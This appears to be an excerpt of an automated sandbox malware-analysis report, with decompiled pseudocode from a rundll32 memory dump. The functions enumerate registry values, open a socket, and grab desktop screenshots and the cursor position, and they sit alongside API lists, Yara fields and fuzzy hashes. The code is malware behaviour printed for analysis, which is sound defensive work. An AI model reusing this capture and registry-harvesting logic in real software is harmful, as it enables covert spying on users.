                                                                                              				intOrPtr _v40;
                                                                                              				int* _v44;
                                                                                              				int* _v48;
                                                                                              				int* _v52;
                                                                                              				void* __esi;
                                                                                              				int* _t94;
                                                                                              				short* _t96;
                                                                                              				int* _t100;
                                                                                              				void* _t101;
                                                                                              				int* _t102;
                                                                                              				signed int _t111;
                                                                                              				short* _t113;
                                                                                              				char* _t114;
                                                                                              				short* _t124;
                                                                                              				void* _t145;
                                                                                              				short* _t146;
                                                                                              				int* _t149;
                                                                                              				short _t161;
                                                                                              				intOrPtr* _t166;
                                                                                              				int* _t167;
                                                                                              				void** _t170;
                                                                                              				void** _t171;
                                                                                              				intOrPtr* _t174;
                                                                                              				int* _t175;
                                                                                              				int* _t180;
                                                                                              				int* _t181;
                                                                                              				void** _t182;
                                                                                              				int* _t185;
                                                                                              				int* _t186;
                                                                                              				int* _t189;
                                                                                              				void* _t190;
                                                                                              				short* _t191;
                                                                                              				int* _t192;
                                                                                              				int _t193;
                                                                                              				short* _t196;
                                                                                              				void* _t197;
                                                                                              				int _t199;
                                                                                              				void* _t200;
                                                                                              				void* _t201;
                                                                                              				void* _t208;
                                                                                              
                                                                                              				_t190 = _a8;
                                                                                              				_t179 = _a4;
                                                                                              				_v40 = __ecx;
                                                                                              				_v44 = 0;
                                                                                              				_t170 = _a4 + 1;
                                                                                              				_t94 = _t190 - 1 + _t170;
                                                                                              				_v48 = _t170;
                                                                                              				_v52 = _t94;
                                                                                              				if(_t94 - _t170 >= 4) {
                                                                                              					_t145 =  *_t170;
                                                                                              					_t171 =  &(_t170[1]);
                                                                                              					__eflags = _t171;
                                                                                              					_v48 = _t171;
                                                                                              				} else {
                                                                                              					_v44 = 1;
                                                                                              					_t145 = 0;
                                                                                              				}
                                                                                              				_t96 = E04260D20( &_v52);
                                                                                              				_v32 = _t96;
                                                                                              				if(_v44 == 0) {
                                                                                              					_t149 =  &_v52;
                                                                                              					_v44 = 0;
                                                                                              					_v52 = 0;
                                                                                              					_v48 = 0;
                                                                                              					E0425B9C0(_t149, _t190);
                                                                                              					_t180 = _v48;
                                                                                              					E0427E060(_t180, _t179, _t190);
                                                                                              					_t201 = _t200 + 0xc;
                                                                                              					_v24 = 0;
                                                                                              					_v8 = 0;
                                                                                              					_t181 = _t180 + _t190;
                                                                                              					_v12 = 0;
                                                                                              					_t191 = _v32;
                                                                                              					_v48 = _t181;
                                                                                              					_a8 = 0;
                                                                                              					_t100 = RegOpenKeyExW(_t145, _t191, 0, 0x20119,  &_a8);
                                                                                              					if(_t100 == 0 && RegQueryInfoKeyW(_a8, 0, 0, 0, 0, 0, 0,  &_v24,  &_v8,  &_v12, _t100, _t100) == 0) {
                                                                                              						_t208 = _v24 - 1;
                                                                                              						if(_t208 >= 0) {
                                                                                              							_t111 = _v8 + 1;
                                                                                              							_v16 = _t111;
                                                                                              							_t193 = 0;
                                                                                              							_push( ~(_t208 > 0) | _t111 * 0x00000002);
                                                                                              							_t113 = E04275B55( ~(_t208 > 0) | _t111 * 0x00000002, 0, _t208);
                                                                                              							_push(_v12);
                                                                                              							_t146 = _t113;
                                                                                              							_t114 = E04275B55( ~(_t208 > 0) | _t111 * 0x00000002, 0, _t208);
                                                                                              							_t201 = _t201 + 8;
                                                                                              							_v20 = _t114;
                                                                                              							_v16 = _v8 + 1;
                                                                                              							_a4 = _v12;
                                                                                              							_t149 =  &_a4;
                                                                                              							if(RegEnumValueW(_a8, 0, _t146,  &_v16, 0,  &_v28, _t114, _t149) == 0) {
                                                                                              								do {
                                                                                              									_v36 = _t193 + 1;
                                                                                              									_t53 = ( ==  ? 0 : _t181 - _v52) + 4; // 0x4
                                                                                              									E0425B9C0( &_v52, _t53);
                                                                                              									_t174 = _v48;
                                                                                              									_t124 = _t146;
                                                                                              									 *_t174 = _v28;
                                                                                              									_t175 = _t174 + 4;
                                                                                              									_v48 = _t175;
                                                                                              									_t56 =  &(_t124[1]); // 0x2
                                                                                              									_t196 = _t56;
                                                                                              									do {
                                                                                              										_t161 =  *_t124;
                                                                                              										_t124 =  &(_t124[1]);
                                                                                              									} while (_t161 != 0);
                                                                                              									_t197 = 2 + (_t124 - _t196 >> 1) * 2;
                                                                                              									_t177 =  ==  ? 0 : _t175 - _v52;
                                                                                              									E0425B9C0( &_v52, ( ==  ? 0 : _t175 - _v52) + _t197);
                                                                                              									_t185 = _v48;
                                                                                              									E0427E060(_t185, _t146, _t197);
                                                                                              									_t186 = _t185 + _t197;
                                                                                              									_v48 = _t186;
                                                                                              									_t67 = ( ==  ? 0 : _t186 - _v52) + 4; // 0x4
                                                                                              									E0425B9C0( &_v52, _t67);
                                                                                              									_t166 = _v48;
                                                                                              									 *_t166 = _a4;
                                                                                              									_t167 = _t166 + 4;
                                                                                              									_t199 = _a4;
                                                                                              									_v48 = _t167;
                                                                                              									_t169 =  ==  ? 0 : _t167 - _v52;
                                                                                              									_t149 =  &_v52;
                                                                                              									E0425B9C0(_t149, ( ==  ? 0 : _t167 - _v52) + _t199);
                                                                                              									_t189 = _v48;
                                                                                              									E0427E060(_t189, _v20, _t199);
                                                                                              									_t201 = _t201 + 0x18;
                                                                                              									_t181 = _t189 + _t199;
                                                                                              									_t193 = _v36;
                                                                                              									_v16 = _v8 + 1;
                                                                                              									_a4 = _v12;
                                                                                              									_v48 = _t181;
                                                                                              								} while (RegEnumValueW(_a8, _t193, _t146,  &_v16, 0,  &_v28, _v20,  &_a4) == 0);
                                                                                              							}
                                                                                              							if(_t146 != 0) {
                                                                                              								E04275B0F(_t146);
                                                                                              								_t201 = _t201 + 4;
                                                                                              							}
                                                                                              							_t118 = _v20;
                                                                                              							if(_v20 != 0) {
                                                                                              								E04275B0F(_t118);
                                                                                              								_t201 = _t201 + 4;
                                                                                              							}
                                                                                              							_t191 = _v32;
                                                                                              						}
                                                                                              					}
                                                                                              					_t101 = _a8;
                                                                                              					if(_t101 != 0) {
                                                                                              						RegCloseKey(_t101);
                                                                                              					}
                                                                                              					if(_t191 != 0) {
                                                                                              						E04275B0F(_t191);
                                                                                              						_t201 = _t201 + 4;
                                                                                              					}
                                                                                              					_t192 = _v52;
                                                                                              					if(_t192 != 0) {
                                                                                              						_t182 = _t181 - _t192;
                                                                                              						__eflags = _t182;
                                                                                              						_t102 = _t192;
                                                                                              					} else {
                                                                                              						_t182 = 0;
                                                                                              						_t102 = 0;
                                                                                              					}
                                                                                              					_push(_t149);
                                                                                              					_push(0x3f);
                                                                                              					_push(_t182);
                                                                                              					_push(_t102);
                                                                                              					_t96 = E04251C60( *((intOrPtr*)(_v40 + 4)));
                                                                                              					if(_t192 != 0) {
                                                                                              						return E04275B0F(_t192);
                                                                                              					}
                                                                                              				}
                                                                                              				return _t96;
                                                                                              			}



















































                                                                                              0x042613c8
                                                                                              0x042613cc
                                                                                              0x042613cf
                                                                                              0x042613d5
                                                                                              0x042613dc
                                                                                              0x042613df
                                                                                              0x042613e1
                                                                                              0x042613e4
                                                                                              0x042613ec
                                                                                              0x042613f9
                                                                                              0x042613fb
                                                                                              0x042613fb
                                                                                              0x042613fe
                                                                                              0x042613ee
                                                                                              0x042613ee
                                                                                              0x042613f5
                                                                                              0x042613f5
                                                                                              0x04261404
                                                                                              0x0426140d
                                                                                              0x04261410
                                                                                              0x04261417
                                                                                              0x0426141a
                                                                                              0x04261421
                                                                                              0x04261428
                                                                                              0x0426142f
                                                                                              0x04261436
                                                                                              0x0426143a
                                                                                              0x0426143f
                                                                                              0x04261442
                                                                                              0x0426144c
                                                                                              0x04261453
                                                                                              0x04261455
                                                                                              0x0426145c
                                                                                              0x04261469
                                                                                              0x0426146c
                                                                                              0x04261473
                                                                                              0x0426147b
                                                                                              0x042614ac
                                                                                              0x042614b0
                                                                                              0x042614bb
                                                                                              0x042614c1
                                                                                              0x042614c4
                                                                                              0x042614cf
                                                                                              0x042614d0
                                                                                              0x042614d5
                                                                                              0x042614d8
                                                                                              0x042614da
                                                                                              0x042614e2
                                                                                              0x042614e6
                                                                                              0x042614e9
                                                                                              0x042614ef
                                                                                              0x042614f2
                                                                                              0x0426150d
                                                                                              0x04261513
                                                                                              0x0426151d
                                                                                              0x04261529
                                                                                              0x0426152d
                                                                                              0x04261532
                                                                                              0x04261535
                                                                                              0x04261537
                                                                                              0x04261539
                                                                                              0x0426153c
                                                                                              0x0426153f
                                                                                              0x0426153f
                                                                                              0x04261542
                                                                                              0x04261542
                                                                                              0x04261545
                                                                                              0x04261548
                                                                                              0x04261553
                                                                                              0x04261561
                                                                                              0x0426156b
                                                                                              0x04261570
                                                                                              0x04261576
                                                                                              0x0426157e
                                                                                              0x04261585
                                                                                              0x04261595
                                                                                              0x04261599
                                                                                              0x0426159e
                                                                                              0x042615a6
                                                                                              0x042615a8
                                                                                              0x042615ab
                                                                                              0x042615ae
                                                                                              0x042615b5
                                                                                              0x042615bc
                                                                                              0x042615bf
                                                                                              0x042615c4
                                                                                              0x042615cc
                                                                                              0x042615d4
                                                                                              0x042615d8
                                                                                              0x042615da
                                                                                              0x042615dd
                                                                                              0x042615e3
                                                                                              0x042615f0
                                                                                              0x04261605
                                                                                              0x04261513
                                                                                              0x0426160f
                                                                                              0x04261612
                                                                                              0x04261617
                                                                                              0x04261617
                                                                                              0x0426161a
                                                                                              0x0426161f
                                                                                              0x04261622
                                                                                              0x04261627
                                                                                              0x04261627
                                                                                              0x0426162a
                                                                                              0x0426162a
                                                                                              0x042614b0
                                                                                              0x0426162d
                                                                                              0x04261632
                                                                                              0x04261635
                                                                                              0x04261635
                                                                                              0x0426163d
                                                                                              0x04261640
                                                                                              0x04261645
                                                                                              0x04261645
                                                                                              0x04261648
                                                                                              0x0426164d
                                                                                              0x04261655
                                                                                              0x04261655
                                                                                              0x04261657
                                                                                              0x0426164f
                                                                                              0x0426164f
                                                                                              0x04261651
                                                                                              0x04261651
                                                                                              0x04261659
                                                                                              0x0426165d
                                                                                              0x0426165f
                                                                                              0x04261660
                                                                                              0x04261664
                                                                                              0x0426166b
                                                                                              0x00000000
                                                                                              0x04261673
                                                                                              0x0426166b
                                                                                              0x0426167c

                                                                                              APIs
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020119,?), ref: 04261473
                                                                                              • RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00020119), ref: 0426149E
                                                                                              • RegEnumValueW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00020119,?), ref: 04261505
                                                                                              • RegEnumValueW.ADVAPI32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000004,?,?,?,00000000,00000004), ref: 042615FF
                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,00000000,00020119,?), ref: 04261635
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: EnumValue$CloseInfoOpenQuery
                                                                                              • String ID:
                                                                                              • API String ID: 2078201404-0
                                                                                              • Opcode ID: f47c2f262f935432b8edc14f4fa67aa4d499fc338c32f134f709bf816000ba01
                                                                                              • Instruction ID: cf437f4dd2268189c92656267d043b61312dbd889b5306f4a8dc28ec12314f39
                                                                                              • Opcode Fuzzy Hash: f47c2f262f935432b8edc14f4fa67aa4d499fc338c32f134f709bf816000ba01
                                                                                              • Instruction Fuzzy Hash: 93911FB5E10119ABDF14DFA9D844AEEBBB8FF48314F058029E916B7240D730B955CFA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0426D020: StrChrW.SHLWAPI(?,0000003A), ref: 0426D044
                                                                                              • WSASetLastError.WS2_32(0000273F,?,?), ref: 0426EFD6
                                                                                                • Part of subcall function 0426D0D0: WSASetLastError.WS2_32(00002741), ref: 0426D0FA
                                                                                              • socket.WS2_32(00000000,00000001,00000006), ref: 0426EFF9
                                                                                              • WSAIoctl.WS2_32(00000000,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 0426F043
                                                                                              • WSAGetLastError.WS2_32 ref: 0426F04E
                                                                                              • WSACreateEvent.WS2_32 ref: 0426F06E
                                                                                                • Part of subcall function 04257AC0: RaiseException.KERNEL32(C000001D,00000001,00000000,00000000,?,042583DB,80004005,?,042587F8,04258B6E,00000000,?), ref: 04257ADE
                                                                                                • Part of subcall function 04257AC0: RtlEnterCriticalSection.NTDLL(?), ref: 0426FA53
                                                                                                • Part of subcall function 04257AC0: RtlLeaveCriticalSection.NTDLL(?), ref: 0426FA7B
                                                                                                • Part of subcall function 04257AC0: SetLastError.KERNEL32(0000139F,?,042583DB,80004005,?,042587F8,04258B6E,00000000,?), ref: 0426FA87
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$CriticalSection$CreateEnterEventExceptionIoctlLeaveRaisesocket
                                                                                              • String ID:
                                                                                              • API String ID: 688454317-0
                                                                                              • Opcode ID: 98ae11ad6c768b9abf8a0de5a1c0676536a4169b7dccd9896671e3ab5a21d99b
                                                                                              • Instruction ID: a74d68e940c5a324354eb1892b364ca7a4a2559ce7d47b7615a6c2f41ef1e49b
                                                                                              • Opcode Fuzzy Hash: 98ae11ad6c768b9abf8a0de5a1c0676536a4169b7dccd9896671e3ab5a21d99b
                                                                                              • Instruction Fuzzy Hash: B6418675B202099BEB24DFA5E984B6E77A5EF44310F10412EE907D72C1EBB1F981CB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 82%
                                                                                              			E0428130A(signed int* __ecx, signed int __edx) {
                                                                                              				signed int _v8;
                                                                                              				intOrPtr* _v12;
                                                                                              				signed int _v16;
                                                                                              				signed int _t28;
                                                                                              				signed int _t29;
                                                                                              				intOrPtr _t33;
                                                                                              				signed int _t37;
                                                                                              				signed int _t38;
                                                                                              				signed int _t40;
                                                                                              				void* _t50;
                                                                                              				signed int _t56;
                                                                                              				intOrPtr* _t57;
                                                                                              				signed int _t68;
                                                                                              				signed int _t71;
                                                                                              				signed int _t72;
                                                                                              				signed int _t74;
                                                                                              				signed int _t75;
                                                                                              				signed int _t78;
                                                                                              				signed int _t80;
                                                                                              				signed int* _t81;
                                                                                              				signed int _t85;
                                                                                              				void* _t86;
                                                                                              
                                                                                              				_t72 = __edx;
                                                                                              				_v12 = __ecx;
                                                                                              				_t28 =  *__ecx;
                                                                                              				_t81 =  *_t28;
                                                                                              				if(_t81 != 0) {
                                                                                              					_t29 =  *0x42a4008; // 0xd33db39d
                                                                                              					_t56 =  *_t81 ^ _t29;
                                                                                              					_t78 = _t81[1] ^ _t29;
                                                                                              					_t83 = _t81[2] ^ _t29;
                                                                                              					asm("ror edi, cl");
                                                                                              					asm("ror esi, cl");
                                                                                              					asm("ror ebx, cl");
                                                                                              					if(_t78 != _t83) {
                                                                                              						L14:
                                                                                              						 *_t78 = E042811CB( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
                                                                                              						_t33 = E0427E79C(_t56);
                                                                                              						_t57 = _v12;
                                                                                              						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
                                                                                              						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E0427E79C(_t78 + 4);
                                                                                              						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E0427E79C(_t83);
                                                                                              						_t37 = 0;
                                                                                              						L15:
                                                                                              						return _t37;
                                                                                              					}
                                                                                              					_t38 = 0x200;
                                                                                              					_t85 = _t83 - _t56 >> 2;
                                                                                              					if(_t85 <= 0x200) {
                                                                                              						_t38 = _t85;
                                                                                              					}
                                                                                              					_t80 = _t38 + _t85;
                                                                                              					if(_t80 == 0) {
                                                                                              						_t80 = 0x20;
                                                                                              					}
                                                                                              					if(_t80 < _t85) {
                                                                                              						L9:
                                                                                              						_push(4);
                                                                                              						_t80 = _t85 + 4;
                                                                                              						_push(_t80);
                                                                                              						_v8 = E04281785(_t56);
                                                                                              						_t40 = E042884AD(0);
                                                                                              						_t68 = _v8;
                                                                                              						_t86 = _t86 + 0x10;
                                                                                              						if(_t68 != 0) {
                                                                                              							goto L11;
                                                                                              						}
                                                                                              						_t37 = _t40 | 0xffffffff;
                                                                                              						goto L15;
                                                                                              					} else {
                                                                                              						_push(4);
                                                                                              						_push(_t80);
                                                                                              						_v8 = E04281785(_t56);
                                                                                              						E042884AD(0);
                                                                                              						_t68 = _v8;
                                                                                              						_t86 = _t86 + 0x10;
                                                                                              						if(_t68 != 0) {
                                                                                              							L11:
                                                                                              							_t56 = _t68;
                                                                                              							_v8 = _t68 + _t85 * 4;
                                                                                              							_t83 = _t68 + _t80 * 4;
                                                                                              							_t78 = _v8;
                                                                                              							_push(0x20);
                                                                                              							asm("ror eax, cl");
                                                                                              							_t71 = _t78;
                                                                                              							_v16 = 0 ^  *0x42a4008;
                                                                                              							asm("sbb edx, edx");
                                                                                              							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
                                                                                              							_v8 = _t74;
                                                                                              							if(_t74 == 0) {
                                                                                              								goto L14;
                                                                                              							}
                                                                                              							_t75 = _v16;
                                                                                              							_t50 = 0;
                                                                                              							do {
                                                                                              								_t50 = _t50 + 1;
                                                                                              								 *_t71 = _t75;
                                                                                              								_t71 = _t71 + 4;
                                                                                              							} while (_t50 != _v8);
                                                                                              							goto L14;
                                                                                              						}
                                                                                              						goto L9;
                                                                                              					}
                                                                                              				}
                                                                                              				return _t28 | 0xffffffff;
                                                                                              			}

























                                                                                              0x0428130a
                                                                                              0x04281314
                                                                                              0x04281318
                                                                                              0x0428131a
                                                                                              0x0428131e
                                                                                              0x04281328
                                                                                              0x04281339
                                                                                              0x0428133e
                                                                                              0x04281340
                                                                                              0x04281342
                                                                                              0x04281344
                                                                                              0x04281346
                                                                                              0x0428134a
                                                                                              0x04281404
                                                                                              0x04281412
                                                                                              0x04281414
                                                                                              0x04281419
                                                                                              0x04281420
                                                                                              0x04281430
                                                                                              0x0428143f
                                                                                              0x04281442
                                                                                              0x04281444
                                                                                              0x00000000
                                                                                              0x04281445
                                                                                              0x04281352
                                                                                              0x04281357
                                                                                              0x0428135c
                                                                                              0x0428135e
                                                                                              0x0428135e
                                                                                              0x04281360
                                                                                              0x04281365
                                                                                              0x04281369
                                                                                              0x04281369
                                                                                              0x0428136c
                                                                                              0x0428138b
                                                                                              0x0428138b
                                                                                              0x0428138d
                                                                                              0x04281390
                                                                                              0x04281399
                                                                                              0x0428139c
                                                                                              0x042813a1
                                                                                              0x042813a4
                                                                                              0x042813a9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042813ab
                                                                                              0x00000000
                                                                                              0x0428136e
                                                                                              0x0428136e
                                                                                              0x04281370
                                                                                              0x04281379
                                                                                              0x0428137c
                                                                                              0x04281381
                                                                                              0x04281384
                                                                                              0x04281389
                                                                                              0x042813b3
                                                                                              0x042813b6
                                                                                              0x042813b8
                                                                                              0x042813bb
                                                                                              0x042813c3
                                                                                              0x042813c9
                                                                                              0x042813d0
                                                                                              0x042813d2
                                                                                              0x042813da
                                                                                              0x042813e9
                                                                                              0x042813ed
                                                                                              0x042813ef
                                                                                              0x042813f2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042813f4
                                                                                              0x042813f7
                                                                                              0x042813f9
                                                                                              0x042813f9
                                                                                              0x042813fa
                                                                                              0x042813fc
                                                                                              0x042813ff
                                                                                              0x00000000
                                                                                              0x042813f9
                                                                                              0x00000000
                                                                                              0x04281389
                                                                                              0x0428136c
                                                                                              0x00000000

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free
                                                                                              • String ID:
                                                                                              • API String ID: 269201875-0
                                                                                              • Opcode ID: 71d60d1be889a18884c88c75f42e59e6306579a1ebe7d992d1d8440095d6e45b
                                                                                              • Instruction ID: a93bbe2068893d1f4900d43d44e1cd9e35863152ef1307aaccf22998af88f28b
                                                                                              • Opcode Fuzzy Hash: 71d60d1be889a18884c88c75f42e59e6306579a1ebe7d992d1d8440095d6e45b
                                                                                              • Instruction Fuzzy Hash: F841A132B112049BDB14EF78C880A6EB7B5EF88724F1545ADD555EB2C1E731B912DB80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 90%
                                                                                              			E04262760(void* __ecx, void* __esi, int* _a4) {
                                                                                              				struct tagPOINT _v12;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				intOrPtr _t59;
                                                                                              				signed int _t66;
                                                                                              				signed int _t67;
                                                                                              				struct HWND__* _t77;
                                                                                              				int* _t79;
                                                                                              				void* _t90;
                                                                                              				void* _t91;
                                                                                              				signed int _t92;
                                                                                              				void* _t93;
                                                                                              				signed int _t94;
                                                                                              
                                                                                              				_t91 = __esi;
                                                                                              				_t79 = _a4;
                                                                                              				_t90 = __ecx;
                                                                                              				if(_t79 == 0 ||  *((intOrPtr*)(__ecx + 0x14)) == 0) {
                                                                                              					__eflags = 0;
                                                                                              					return 0;
                                                                                              				} else {
                                                                                              					if(E04265570(_t79, __ecx, __esi) != 0) {
                                                                                              						ReleaseDC( *(_t90 + 0x104),  *(_t90 + 0x3c));
                                                                                              						_t77 = GetDesktopWindow();
                                                                                              						 *(_t90 + 0x104) = _t77;
                                                                                              						 *(_t90 + 0x3c) = GetDC(_t77);
                                                                                              					}
                                                                                              					 *(_t90 + 0x18) = 0;
                                                                                              					 *((char*)( *((intOrPtr*)(_t90 + 0x14)))) =  *((intOrPtr*)(_t90 + 4));
                                                                                              					 *(_t90 + 0x18) =  *(_t90 + 0x18) + 1;
                                                                                              					GetCursorPos( &_v12);
                                                                                              					asm("movq xmm0, [ebp-0x8]");
                                                                                              					asm("movq [eax], xmm0");
                                                                                              					 *(_t90 + 0x18) =  *(_t90 + 0x18) + 8;
                                                                                              					 *((char*)( *((intOrPtr*)(_t90 + 0x14)) +  *(_t90 + 0x18))) = E04262370(_t90 + 0x80);
                                                                                              					 *(_t90 + 0x18) =  *(_t90 + 0x18) + 1;
                                                                                              					if( *((char*)(_t90 + 4)) != 2) {
                                                                                              						_t59 = _v12.y;
                                                                                              						_push(_t91);
                                                                                              						_t92 = _t59 - 0x13;
                                                                                              						__eflags = _t92;
                                                                                              						_t93 =  <  ? 0 : _t92;
                                                                                              						__eflags = _t59 -  *0x42a7b1c; // 0x0
                                                                                              						if(__eflags == 0) {
                                                                                              							L9:
                                                                                              							_t94 =  *(_t90 + 0x28);
                                                                                              						} else {
                                                                                              							_t67 = E04262B10(_t90, _t93);
                                                                                              							__eflags = _t67;
                                                                                              							if(_t67 == 0) {
                                                                                              								goto L9;
                                                                                              							} else {
                                                                                              								_t94 = _t93 + 0x13;
                                                                                              							}
                                                                                              						}
                                                                                              						__eflags = _t94 -  *((intOrPtr*)(_t90 + 0x24));
                                                                                              						while(_t94 <  *((intOrPtr*)(_t90 + 0x24))) {
                                                                                              							_t66 = E04262B10(_t90, _t94);
                                                                                              							__eflags = _t66;
                                                                                              							if(_t66 != 0) {
                                                                                              								_t94 = _t94 + 0x13;
                                                                                              								__eflags = _t94;
                                                                                              							}
                                                                                              							_t94 = _t94 + 0x13;
                                                                                              							__eflags = _t94 -  *((intOrPtr*)(_t90 + 0x24));
                                                                                              						}
                                                                                              						 *0x42a7b1c = _v12.y;
                                                                                              						asm("cdq");
                                                                                              						_t45 = ( *(_t90 + 0x28) + 3) % 0x13;
                                                                                              						__eflags = _t45;
                                                                                              						 *_t79 =  *(_t90 + 0x18);
                                                                                              						 *(_t90 + 0x28) = _t45;
                                                                                              						return  *((intOrPtr*)(_t90 + 0x14));
                                                                                              					} else {
                                                                                              						BitBlt( *(_t90 + 0x78), 0, 0,  *( *((intOrPtr*)(_t90 + 0x60)) + 4),  *( *((intOrPtr*)(_t90 + 0x60)) + 8),  *(_t90 + 0x3c), 0, 0,  *(_t90 + 0x10));
                                                                                              						 *_t79 = E04256F00( *((intOrPtr*)(_t90 + 0x70)),  *((intOrPtr*)(_t90 + 0x58)),  *((intOrPtr*)(_t90 + 0x14)) +  *(_t90 + 0x18),  *((intOrPtr*)( *((intOrPtr*)(_t90 + 0x60)) + 0x14))) +  *(_t90 + 0x18);
                                                                                              						return  *((intOrPtr*)(_t90 + 0x14));
                                                                                              					}
                                                                                              				}
                                                                                              			}
















                                                                                              0x04262760
                                                                                              0x04262767
                                                                                              0x0426276b
                                                                                              0x0426276f
                                                                                              0x042628b2
                                                                                              0x042628b8
                                                                                              0x0426277f
                                                                                              0x04262786
                                                                                              0x04262791
                                                                                              0x04262797
                                                                                              0x0426279e
                                                                                              0x042627aa
                                                                                              0x042627aa
                                                                                              0x042627b0
                                                                                              0x042627ba
                                                                                              0x042627bf
                                                                                              0x042627c3
                                                                                              0x042627d5
                                                                                              0x042627da
                                                                                              0x042627de
                                                                                              0x042627ed
                                                                                              0x042627ef
                                                                                              0x042627f6
                                                                                              0x04262840
                                                                                              0x04262845
                                                                                              0x04262846
                                                                                              0x04262849
                                                                                              0x0426284b
                                                                                              0x0426284e
                                                                                              0x04262854
                                                                                              0x04262867
                                                                                              0x04262867
                                                                                              0x04262856
                                                                                              0x04262859
                                                                                              0x0426285e
                                                                                              0x04262860
                                                                                              0x00000000
                                                                                              0x04262862
                                                                                              0x04262862
                                                                                              0x04262862
                                                                                              0x04262860
                                                                                              0x0426286a
                                                                                              0x0426286d
                                                                                              0x04262873
                                                                                              0x04262878
                                                                                              0x0426287a
                                                                                              0x0426287c
                                                                                              0x0426287c
                                                                                              0x0426287c
                                                                                              0x0426287f
                                                                                              0x04262882
                                                                                              0x04262882
                                                                                              0x0426288f
                                                                                              0x0426289a
                                                                                              0x0426289b
                                                                                              0x0426289b
                                                                                              0x042628a0
                                                                                              0x042628a6
                                                                                              0x042628ae
                                                                                              0x042627f8
                                                                                              0x04262812
                                                                                              0x04262833
                                                                                              0x0426283d
                                                                                              0x0426283d
                                                                                              0x042627f6

                                                                                              APIs
                                                                                                • Part of subcall function 04265570: GetCurrentThreadId.KERNEL32 ref: 04265588
                                                                                                • Part of subcall function 04265570: GetThreadDesktop.USER32(00000000), ref: 0426558F
                                                                                                • Part of subcall function 04265570: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 042655CF
                                                                                                • Part of subcall function 04265570: OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 042655DA
                                                                                                • Part of subcall function 04265570: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 0426560E
                                                                                                • Part of subcall function 04265570: lstrcmpi.KERNEL32(?,?), ref: 0426561E
                                                                                                • Part of subcall function 04265570: SetThreadDesktop.USER32(00000000), ref: 04265629
                                                                                                • Part of subcall function 04265570: CloseDesktop.USER32(?), ref: 0426563D
                                                                                                • Part of subcall function 04265570: CloseDesktop.USER32(00000000), ref: 04265640
                                                                                              • ReleaseDC.USER32(?,?), ref: 04262791
                                                                                              • GetDesktopWindow.USER32 ref: 04262797
                                                                                              • GetDC.USER32(00000000), ref: 042627A4
                                                                                                • Part of subcall function 04262B10: BitBlt.GDI32(00000000,00000000,00000000,?,00000001,?,00000000,00000000,?), ref: 04262B37
                                                                                                • Part of subcall function 04262B10: SetRect.USER32(?,000000FF,-00000013,000000FF,00000026), ref: 04262B60
                                                                                              • GetCursorPos.USER32(?), ref: 042627C3
                                                                                              • BitBlt.GDI32(?,00000000,00000000,00000002,?,?,00000000,00000000,?), ref: 04262812
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Desktop$Thread$CloseInformationObjectUser$CurrentCursorInputOpenRectReleaseWindowlstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 1863377006-0
                                                                                              • Opcode ID: 26b41fa1743f96209a90394959e4ea17876647da1c90de26affa21456369a4d3
                                                                                              • Instruction ID: e2e078ebb88498728559896bf8fa62eb4759dbd8e52835782e81264a95570dca
                                                                                              • Opcode Fuzzy Hash: 26b41fa1743f96209a90394959e4ea17876647da1c90de26affa21456369a4d3
